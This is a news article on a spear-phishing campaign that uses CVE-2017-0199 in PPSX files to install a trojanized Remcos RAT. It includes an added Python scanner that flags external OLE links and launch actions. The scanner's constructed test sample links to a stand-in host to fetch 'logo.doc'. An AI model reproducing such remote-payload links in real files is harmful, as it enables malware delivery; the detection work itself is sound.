Cyber criminals exploiting a vulnerability via PowerPoint



Cyber criminals are exploiting a vulnerability in Microsoft Office to deliver malware via PowerPoint files. The flaw lies in the Windows Object Linking and Embedding (OLE) interface, which attackers have been using to distribute malicious Microsoft Office files.

The flaw has commonly been used to deliver infected .RTF documents, but security researchers have now spotted attackers using it to weaponize PowerPoint slideshow (.PPSX) files for the first time.

The attack begins with a spear-phishing email. The campaign mainly targets organizations in the electronics manufacturing industry. The sender address is made to look like that of a business partner, and the message appears to be an order request, with an attachment that allegedly contains shipping information.


The attachment is a malicious PowerPoint file that displays the text "CVE-2017-8570", a reference to a different Microsoft Office vulnerability than the one actually used in this attack.

CVE-2017-0199 vulnerability


Opening the malicious file triggers an exploit for the CVE-2017-0199 vulnerability, which starts the infection chain. The malicious code runs through the PowerPoint Show animation feature and downloads a file named logo.doc.

The downloaded logo.doc contains XML and JavaScript code that runs PowerShell to execute a file called "RATMAN.EXE", a trojanized version of the Remcos remote access tool, which then connects to a command-and-control server.


Remcos is capable of many criminal operations: compromised machines are at risk from keylogging, screen capture, webcam and microphone recording, and the download and execution of additional malware, which can give the attacker full control over the infected machine.

The sample is packed with a .NET protector that adds several layers of obfuscation and anti-analysis behaviour to make it difficult for researchers to reverse engineer. Critically, most methods of detecting CVE-2017-0199 exploitation focus on the RTF attack method, so using a PPSX PowerPoint file as the attack vector lets the attackers slip past antivirus products tuned to the RTF variant.
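The two passages above describe the PPSX chain (an OLE link on a slide, fired through the animation/action feature, that fetches logo.doc) and note that most detections look only at RTF. The following scanner is an added example, not code from the article or from the researchers who reported the campaign. It unpacks a PPSX/PPTX (an OOXML zip) and flags two things: an OLE object relationship in a slide's `.rels` part whose `TargetMode` is `External` (a legitimate deck embeds its OLE objects under `ppt/embeddings/`), and a `ppaction://program` launch action in the slide XML. Both heuristics, the relationship location and the action string, are assumptions about where the PPSX variant plants its hooks; the in-memory sample archive, including the TEST-NET address `192.0.2.10`, is constructed for the demonstration and is not a real malicious file.

```python
"""Heuristic scanner for the PPSX variant of the CVE-2017-0199 delivery:
a slide that carries an externally linked OLE object (the moniker that
fetches logo.doc) plus an action that launches it.

Added example, not code from the original article or its source report.
Assumptions: the external OLE link lives in ppt/slides/_rels/slideN.xml.rels
with TargetMode="External", and the trigger is a ppaction://program action.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")


def find_external_ole(ppsx_bytes: bytes) -> list:
    """Return (rels_part, target) for every OLE object relationship in a slide
    whose target is external (URL/UNC path) rather than an embedded part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("ppt/slides/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    findings.append((name, rel.get("Target")))
    return findings


def find_program_actions(ppsx_bytes: bytes) -> list:
    """Return slide parts containing a ppaction://program action, i.e. a
    click/animation action that launches the linked object (assumed trigger)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as z:
        for name in z.namelist():
            if name.startswith("ppt/slides/") and name.endswith(".xml"):
                if b"ppaction://program" in z.read(name):
                    hits.append(name)
    return hits


def is_suspicious(ppsx_bytes: bytes) -> bool:
    """Flag the file when both heuristics fire; either alone still merits a look."""
    return bool(find_external_ole(ppsx_bytes)) and bool(find_program_actions(ppsx_bytes))


# Minimal slide and relationship parts used to build the constructed samples.
SLIDE_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"
       xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
       xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <p:cSld><p:spTree>
    <p:graphicFrame><p:nvGraphicFramePr>
      <p:cNvPr id="4" name="Object 1">{action}</p:cNvPr>
    </p:nvGraphicFramePr></p:graphicFrame>
  </p:spTree></p:cSld>
</p:sld>"""

RELS_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{ns}">
  <Relationship Id="rId2" Type="{ole}" Target="{target}"{mode}/>
</Relationships>"""


def build_sample(malicious: bool) -> bytes:
    """Construct a minimal PPSX-like archive in memory (constructed test data,
    not a real sample). The malicious variant links the OLE object to an
    external URL on a TEST-NET address and adds the launch action."""
    if malicious:
        action = '<a:hlinkClick r:id="rId2" action="ppaction://program"/>'
        target, mode = "http://192.0.2.10/logo.doc", ' TargetMode="External"'
    else:
        action = ""
        target, mode = "../embeddings/oleObject1.bin", ""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/slides/slide1.xml", SLIDE_TEMPLATE.format(action=action))
        z.writestr("ppt/slides/_rels/slide1.xml.rels",
                   RELS_TEMPLATE.format(ns=REL_NS, ole=OLE_REL_TYPE,
                                        target=target, mode=mode))
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("malicious", build_sample(True)),
                          ("benign", build_sample(False))):
        print(label, find_external_ole(sample), find_program_actions(sample),
              is_suspicious(sample))
```

Run it against real attachments by reading the file bytes and calling `is_suspicious`; an external OLE target pointing at an HTTP or UNC location is the indicator worth alerting on regardless of whether the action string is present, since the remote document is what carries the next stage.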

Microsoft released patches addressing the vulnerability in April 2017, and systems updated with them are safe from these attacks.
